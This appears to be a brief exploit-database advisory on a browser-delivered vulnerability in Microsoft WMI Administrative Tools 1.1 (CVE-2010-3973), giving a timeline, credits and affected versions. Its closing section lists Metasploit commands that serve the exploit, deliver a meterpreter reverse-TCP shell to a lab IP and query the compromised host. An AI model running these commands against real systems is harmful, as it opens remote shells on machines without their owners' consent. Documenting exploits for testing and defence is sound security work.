Timeline :
Vulnerability & PoC disclosed by WooYun on 2010-12-22
Metasploit PoC provided on 2010-12-22
PoC provided by :
WooYun
MC
jduck
Reference(s) :
Affected version(s) :
Microsoft WMI Administrative Tools 1.1
Tested on Windows XP SP3
Description :
On 22 December, WooYun, a security researcher, disclosed a vulnerability, accompanied by a PoC, in WMI Administrative Tools 1.1. These tools are not included by default in Microsoft Windows and must be installed separately on Windows XP. The same day, the Metasploit team released a module to industrialize the exploitation of this vulnerability. The vulnerability is identified by CVE-2010-3973 and CVE-2010-4588. Currently, Microsoft has no patch planned.
Commands :
use exploit/windows/browser/wmi_admintools
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
ipconfig